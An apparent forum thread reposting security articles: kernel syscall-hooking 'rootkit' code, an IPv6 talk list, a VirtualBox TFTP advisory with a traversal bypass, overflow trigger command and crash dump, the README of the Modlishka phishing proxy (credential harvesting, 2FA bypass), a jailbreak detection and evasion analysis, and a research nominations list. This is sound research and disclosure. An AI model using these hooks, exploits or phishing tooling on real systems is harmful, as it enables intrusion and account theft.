__cr0; \ preempt_disable(); \ __cr0 = read_cr0() & (~X86_CR0_WP); \ BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ x; \ __cr0 = read_cr0() | X86_CR0_WP; \ BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ preempt_enable(); \ } while (0) (The astute will notice that this is almost identical to the “rare write” mechanism from PaX/grsecurity. This is not a coincidence: it’s based on it!) What’s next? The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault: 1 2 3 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { return -ENOSYS; } …or a fault for a particular user: 1 2 3 4 5 6 7 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { if (current_uid().val == 1005) { return -ENOSYS; } else { return orig_read(fd, buf, count); } } …or return bogus data: 1 2 3 4 5 6 7 8 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { unsigned char kbuf[1024]; memset(kbuf, 'A', sizeof(kbuf)); copy_to_user(buf, kbuf, sizeof(kbuf)); return sizeof(kbuf); } Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound! Wrap up This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you’ll need to read a good kernel module programming guide6 and do the legwork yourself. Our new tool, KRF, does everything mentioned above and more: it can intercept and fault syscalls with per-executable precision, operate on an entire syscall “profile” (e.g., all syscalls that touch the filesystem or perform process scheduling), and can fault in real-time without breaking a sweat. Oh, and static linkage doesn’t bother it one bit: if your program makes any syscalls, KRF will happily fault them. Other work Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there: syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it’s still pretty cool. ptrace(2) can be used to instrument syscalls made by a child process, all within user-space. It comes with two considerable downsides, though: it can’t be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It’s also slow. Chris Wellons’s awesome blog post covers ptrace(2)‘s many abilities. More of a “service request” than a “function” in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication. The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel’s vDSO for many frequently called syscalls, like time(2). No process context switch is necessary. Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur. I won’t detail this because it’s outsite of this post’s scope, but consider that init_module(2) and delete_module(2) are just normal syscalls. Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child. This one’s over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search. Sursa: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  14. IPv6 Talks & Publications At first a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self plug I then decided to put together of list of IPv6 talks I myself gave at several occasions and of publications I (co-) authored. Please find this list below (sorted by years); you can click on the titles to access the respective documents/sources. I hope some of this can be of help for one or the other among you in the course of your own IPv6 efforts. Cheers, Enno 2018 IPv6 Address Management – The First Five Years Properties of IPv6 and Their Implications for Offense & Defense 2017 Why it might make sense to use IPv6 in enterprise infrastructure projects Position Paper on an Enterprise Organization’s IPv6 Address Strategy Balanced Security for IPv6 CPE Revisited Local Packet Filtering with IPv6 IPv6 Address Selection – A Look from the Lab Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications Testing RFC 6980 Implementations with Chiron IPv6 configuration approaches for servers / slides with additional infos IPv6 Properties of Windows Server 2016 / Windows 10 2016 Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404 IPv6 from a Developers’ Perspective Things to Consider When Deploying IPv6 in Enterprise Space IPv6 & Threat Intelligence Protecting Hosts in IPv6 Networks Remote Access and Business Partner Connections Developing an Enterprise IPv6 Security Strategy Dual Stack vs. IPv6-only in Enterprise Networks Things to Consider When Starting Your IPv6 Deployment IPv6 Address Planning in 2016 / Observations 2015 Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I) Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II) Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations Main IPv6 Related Mailing Lists IPv6 in Virtualized Data Centers The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6 IPv6 Address Planning / Some Notes OS IPv6 Behavior in Conflicting Environments What to Do Today if You Want to Deploy IPv6 Tomorrow Is IPv6 more Secure than IPv4? Or Less? IPv6 & Complexity MLD Considered Harmful Reliable & Secure DHCPv6 IPv6-related Requirements for the Internet Uplink or MPLS Networks An MLD Testing Methodology Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6 /48 Considered Harmful. On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs The Persistent Problem of State in IPv6 (Security) IPv6-related Requirements for Security Devices Evaluation of IPv6 Capabilities of Commercial IPAM Solutions 2014 Security Implications of Using IPv6 GUAs Only Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region Evasion of High-End IDPS Devices at the IPv6 Era IPv6 in RFIs/Tendering Processes Protocol Properties & Attack Vectors Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2 I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1 Security Implications of Disruptive Technologies IPv6 for Managers IPv6 Requirements for Cloud Service Providers IPv6 Address Plan Considerations, Part 3: The Plan IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate” IPv6 Address Plan Considerations, Part 1: General Guidelines 2013 Design & Configuration of IPv6 Segments with High Security Requirements IPv6 Capabilities of Commercial Security Components IPAM Requirements in IPv6 Networks IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1 2012 IPv6 Privacy Extensions 2011 Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt IPv6 Security Part 2, RA Guard – Let’s get practical IPv6 Security Part 1, RA Guard – The Theory Sursa: https://insinuator.net/2019/01/ipv6-talks-publications/
  15. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553] In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered from an unprivileged guest user, in the default configuration and without Guest Additions installed. TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (default configuration) runs a read only TFTP server in the IP address 10.0.2.4 to support PXE boot. CVE-2019-2553 - Directory traversal vulnerability The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source: * This code is based on: * * tftp.c - a simple, read-only tftp server for qemu The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below: /** * This function evaluate file name. * @param pu8Payload * @param cbPayload * @param cbFileName * @return VINF_SUCCESS - * VERR_INVALID_PARAMETER - */ DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession) { size_t cbSessionFilename = 0; int rc = VINF_SUCCESS; AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER); cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX); if ( !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3) || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/') || RTStrStr((const char *)pcTftpSession->pszFilename, "/../")) rc = VERR_FILE_NOT_FOUND; /* only allow exported prefixes */ if ( RT_SUCCESS(rc) && !tftp_prefix) rc = VERR_INTERNAL_ERROR; LogFlowFuncLeaveRC(rc); return rc; } This code again is based on the validation done in QEMU (slirp/tftp.c) /* do sanity checks on the filename */ if (!strncmp(req_fname, "../", 3) || req_fname[strlen(req_fname) - 1] == '/' || strstr(req_fname, "/../")) { tftp_send_error(spt, 2, "Access violation", tp); return; } Interesting observation here is, above validation done in QEMU is specific to Linux hosts. However, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as directory separator in Windows, validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to TFTP root folder is C:\Users\\.VirtualBox\TFTP. Payload to read other files from the host needs to be crafted accordingly. Below is the demo: CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option The function tftpSessionOptionParse() sets the value of TFTP options DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader) { ... else if (fWithArg) { if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName)) { rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize); if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX) rc = VERR_INVALID_PARAMETER; } ... 'blksize' option is checked if the value is > UINT16_MAX. Later the value OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content DECLINLINE(int) tftpReadDataBlock(PNATState pData, PTFTPSESSION pcTftpSession, uint8_t *pu8Data, int *pcbReadData) { RTFILE hSessionFile; int rc = VINF_SUCCESS; uint16_t u16BlkSize = 0; . . . AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER); . . . u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value; . . . rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead); . . . } pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect. During the call to RTFileRead(), the file contents can overflow the buffer adjacent to 'pu8Data' by setting a value for blksize greater than the MTU. This bug can be used in combination with directory traversal bug to trigger the heap overflow with controlled data e.g. if shared folders are enabled, guest can drop a file with arbitrary contents in the host, then read the file using directory traversal bug. For the ease of debugging lets use VirtualBox for Linux. Create a file of size say UINT16_MAX in the host TFTP root folder i.e. ~/.config/VirtualBox/TFTP, then read the file from the guest with a large blksize value guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload 10.0.2.4 Thread 30 "NAT" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fff8ccf4700 (LWP 11024)] [----------------------------------registers-----------------------------------] RAX: 0x4141414141414141 ('AAAAAAAA') RBX: 0x7fff8e5f16dc ('A' ...) RCX: 0x1 RDX: 0x4141414141414141 ('AAAAAAAA') RSI: 0x800 RDI: 0x140e730 --> 0x219790326 RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx) R8 : 0x0 R9 : 0x10 R10: 0x41414141 ('AAAA') R11: 0x7fff8e5f1de4 ('A' ...) R12: 0x140e720 --> 0xdead0002 R13: 0x7fff8e5f1704 ('A' ...) R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...) R15: 0x140e730 --> 0x219790326 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fff9457d89f <slirp_uma_alloc>: test rax,rax 0x7fff9457d8a2 <slirp_uma_alloc>: je 0x7fff9457d8b0 <slirp_uma_alloc> 0x7fff9457d8a4 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] => 0x7fff9457d8a8 <slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx 0x7fff9457d8ac <slirp_uma_alloc>: mov rax,QWORD PTR [rbx+0x18] 0x7fff9457d8b0 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] 0x7fff9457d8b4 <slirp_uma_alloc>: mov QWORD PTR [rdx],rax 0x7fff9457d8b7 <slirp_uma_alloc>: mov rax,QWORD PTR [r12+0x88] [------------------------------------stack-------------------------------------] 0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) 0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002 0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045 0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0 0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326 0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0 0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) 0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV Posted by Reno Robert at 6:41 PM Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
  16. ..Modlishka.. Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side). Enjoy Features Some of the most important 'Modlishka' features : Support for majority of 2FA authentication schemes (by design). No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically). Full control of "cross" origin TLS traffic flow from your victims browsers (through custom new techniques). Flexible and easily configurable phishing scenarios through configuration options. Pattern based JavaScript payload injection. Striping website from all encryption and security headers (back to 90's MITM style). User credential harvesting (with context based on URL parameter passed identifiers). Can be extended with your ideas through plugins. Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer. Web panel with a summary of collected credentials and user session impersonation (beta). Written in Go. Action "A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275 Note: google.com was chosen here just as a POC. Installation Latest source code version can be fetched from here (zip) or here (tar). Fetch the code with 'go get' : $ go get -u github.com/drk1wi/Modlishka Compile the binary and you are ready to go: $ cd $GOPATH/src/github.com/drk1wi/Modlishka/ $ make # ./dist/proxy -h Usage of ./dist/proxy: -cert string base64 encoded TLS certificate -certKey string base64 encoded TLS certificate key -certPool string base64 encoded Certification Authority certificate -config string JSON configuration file. Convenient instead of using command line switches. -credParams string Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex) -debug Print debug information -disableSecurity Disable security features like anti-SSRF. Disable at your own risk. -jsRules string Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. -listeningAddress string Listening address (default "127.0.0.1") -listeningPort string Listening port (default "443") -log string Local file to which fetched requests will be written (appended) -phishing string Phishing domain to create - Ex.: target.co -plugins string Comma seperated list of enabled plugin names (default "all") -postOnly Log only HTTP POST requests -rules string Comma separated list of 'string' patterns and their replacements. -target string Main target to proxy - Ex.: https://target.com -targetRes string Comma separated list of target subdomains that need to pass through the proxy -terminateTriggers string Comma separated list of URLs from target's origin which will trigger session termination -terminateUrl string URL to redirect the client after session termination triggers -tls Enable TLS (default false) -trackingCookie string Name of the HTTP cookie used to track the victim (default "id") -trackingParam string Name of the HTTP parameter used to track the victim (default "id") Usage Check out the wiki page for a more detailed overview of the tool usage. FAQ (Frequently Asked Questions) Blog post License Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here. Credits Thanks for helping with the code go to Giuseppe Trotta (@Giutro) Disclaimer This tool is made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users. Sursa: https://github.com/drk1wi/Modlishka
  17. JANUARY 18TH, 2019 Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them Why Do People Jailbreak? Apple’s software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store or make modifications to the behavior of the operating system, a “jailbreak” is required—effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores. Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google’s Project Zero says: Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user’s rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application. The History of Jailbreaking The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz’s original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after. Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones. The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can also exceed $1,000,000 under the right criteria (remote, persistent and zero-click), making a private sale a much more lucrative option than releasing it publicly. Why Do We Care About Jailbreaking at Duo? At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network. Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device: First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device. The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases. Administrators may want to only allow up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version. As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state. * While, in general, we can expect that the App Store review process will prevent actively malicious applications from distribution on the App Store, this is not always the case. The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store. How Are Jailbreaks Usually Detected? There exists only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of “special sauce.” Developers of mobile applications would rather keep their methodology private, and there are no real incentives to talking about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools. Most jailbreak detection methods fall into the following categories: File existence checks URI scheme registration checks Sandbox behavior checks Dynamic linker inspection File Existence Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this file exists on the filesystem, you can be sure your application is running on a jailbroken device. There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm. URI Schemes iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia. iOS allows applications to check which URI schemes are registered, so the presence of the cydia://URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false-positive on a non-jailbroken device. Sandbox Behavior Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device. Dynamic Linker Inspection Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality - the alternative to this is “static linking,” where all code that an executable uses is shipped with the executable. While we haven’t discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and exposes the ability to inspect the libraries loaded into the currently-running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and numbers of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken. How Do End Users Prevent Detection? Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo’s case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications. For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality such that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary. Objective-C Runtime Method Hooking Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (ala Smalltalk). This stands counter to languages like C in which a function call might take the form of a jump to the called method’s location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as “method swizzling,” and takes the form of a call to class_addMethod or method_setImplementation. fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique. Editing the Linker Table When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time they are called, and non-lazy symbol pointers are resolved before the program runs. You can read more about how the linker works on Mike Ash’s blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called. A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook. Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior. This is an example of a hooked version of the fopen function. As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or null if it cannot open the file. If fopen returns non-null when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken. The above hooked version checks the path of the file to be opened against a list of “forbidden” files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation. Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, as hooked to always return a constant value (for example: a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox). Patching the Linker We mentioned that dyld exposes functionality that allows clients to inspect what libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this. To combat this, some anti-jailbreak-detection tools also hook exposed dyld functionality to hide their presence. A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools. Summary These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report “correct” answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible. Can We Reliably Detect Jailbroken Devices? We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc,) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call the fopen syscall wrapper exposed as part of a shared library. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working. As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel. It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say “hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it.” Functions like fopen are just that—functions—but they wrap a special type of instruction used to jump into the kernel. On the x86 architecture, under Linux, the INT 0x80 instruction is the most well-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for “interrupt,” and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code. The iPhone uses the ARM processor architecture. ARM’s equivalent of INT is the SVC opcode (“Supervisor Call”), and the equivalent to INT 0x80 on an ARM processor is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in user-space, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file. The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can actually perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering. Drawbacks Even though this approach solves some of our problems, there are drawbacks. First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not. Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn’t make it impossible. The flow of the data after the syscall—say, a boolean that indicates whether a jailbreak artifact exists—is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel. Conclusion Approaches like this must be considered in the context of a threat model. It is impossible to guaranteethat you will be able to detect a tampered device for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device—who is not a determined attacker—will not be able to evade detection. Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way to strengthening the security posture of your application without relying on obscurity. Sursa: https://duo.com/blog/jailbreak-detector-detector
  18. Top 10 web hacking techniques of 2018 - nominations open James Kettle | 03 January 2019 at 14:43 UTC Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases: Jan 1st: Start to collect community nominations Jan 21st: Launch community vote to build shortlist of top 15 Feb 11th: Panel vote on shortlist to select final top 10 Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17. Nominations so far Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts. How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog EdOverflow | An analysis of logic flaws in web-of-trust services. OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf Scratching the surface of host headers in Safari RCE by uploading a web.config – 003Random’s Blog Security: HTTP Smuggling, Apsis Pound load balancer | RBleug Piercing the Veil: Server Side Request Forgery to NIPRNet access inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra inputzero: An untold story of skype by microsoft | Dhiraj Mishra Neatly bypassing CSP – Wallarm Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf Beyond XSS: Edge Side Include Injection :: GoSecure GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution Logically Bypassing Browser Security Boundaries - Speaker Deck Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out Web Cache Deception Attack - YouTube Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user lanmaster53.com Beyond XSS: Edge Side Include Injection :: GoSecure Scratching the surface of host headers in Safari #309531 Stored XSS in Snapmatic 